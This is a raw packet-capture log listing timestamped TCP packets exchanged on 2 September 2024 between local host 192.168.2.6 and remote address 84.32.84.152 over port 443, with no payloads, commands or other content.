Sep 2, 2024 08:21:15.041205883 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041330099 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041331053 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041349888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041368961 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041383028 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041403055 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041413069 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041423082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041436911 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041445971 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041467905 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041472912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041488886 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041496038 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041533947 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041539907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041579008 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041719913 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041759014 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041773081 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041779041 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.041795969 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.041817904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042162895 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042217016 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042346001 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042397976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042709112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042773962 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042788982 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042799950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042812109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042829990 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042939901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042969942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.042982101 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.042988062 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043010950 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043040991 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043108940 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043138981 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043155909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043163061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043179035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043226957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043267965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043323994 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043423891 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043468952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043479919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043533087 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043557882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043595076 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043608904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043615103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043642044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043698072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043736935 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043745995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043786049 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043787003 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043798923 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043828964 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043899059 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043939114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043940067 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.043950081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.043982983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044027090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044078112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044085026 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044122934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044157982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044203043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044235945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044285059 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044337034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044387102 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044508934 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.044559956 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.044946909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.071814060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.071866035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.071928978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.071940899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.071973085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.072010040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.124768972 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.124818087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.124850988 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.124864101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.124876976 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.124903917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.124927044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.124932051 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125070095 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125118017 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125123978 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125173092 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125236034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125288010 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125431061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125471115 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125500917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125509024 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125514984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125550032 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125576019 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125921965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125967026 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.125979900 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.125986099 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126014948 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126028061 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126068115 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126120090 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126404047 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126444101 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126466036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126472950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126485109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126585007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126635075 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126641989 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126679897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126740932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126791000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.126928091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.126990080 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127115965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127152920 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127171993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127177954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127187967 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127190113 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127227068 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127229929 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127243042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127266884 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127285957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127301931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127309084 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127321959 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127336025 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127352953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127373934 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127381086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127405882 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127407074 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127449036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127556086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127609968 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127739906 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127770901 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127789974 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127796888 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127809048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127831936 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127870083 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127904892 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127924919 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127932072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.127955914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.127966881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.128015995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.128051043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.128066063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.128072977 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.128094912 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.128115892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.128309011 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.154653072 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.154722929 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.154762030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.154772043 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.154819012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.155739069 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.206883907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.206923008 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.206959009 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207000017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207034111 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207040071 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207057953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207101107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207158089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207220078 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207227945 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207274914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207320929 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207360029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207372904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207377911 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207406044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207416058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207835913 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207889080 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.207925081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.207976103 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208142996 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208190918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208210945 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208218098 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208245993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208268881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208508015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208550930 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208559990 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208565950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208586931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208606958 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208789110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208848953 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208930016 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.208978891 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.208986998 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209052086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209091902 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209136963 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209151983 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209182978 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209197044 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209203959 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209259033 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209394932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209430933 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209431887 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209443092 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209443092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209479094 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209491014 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209516048 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209518909 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209530115 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209542036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209578037 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209602118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209644079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209645987 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209665060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209682941 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209702015 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209758997 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209791899 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209817886 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209825039 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.209849119 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209865093 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209959030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.209994078 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.210089922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.210129023 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.210141897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.210148096 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.210172892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.210195065 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.212682009 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.237485886 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.237524986 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.237581015 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.237603903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.237632036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.237659931 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.297888994 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.297972918 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298018932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298029900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298080921 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298094988 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298105955 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298147917 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298161030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298206091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298252106 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298331022 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298381090 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298448086 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298500061 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298573017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298619986 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298655033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298696041 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298770905 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.298814058 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.298949003 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299000978 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299047947 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299098969 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299349070 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299381971 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299407005 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299418926 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299431086 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299458027 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299498081 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299539089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299546957 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299554110 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299583912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299585104 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299603939 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299609900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299637079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299640894 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299686909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299693108 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299736023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299747944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299777985 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299806118 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299813032 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299823999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299850941 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299860001 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299865007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299942970 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299984932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.299992085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.299998045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300029993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300127029 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300164938 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300174952 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300182104 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300203085 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300220966 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300266027 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300272942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300318003 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:15.300347090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300379038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:15.300410986 CEST	49744	443	192.168.2.6	84.32.84.152
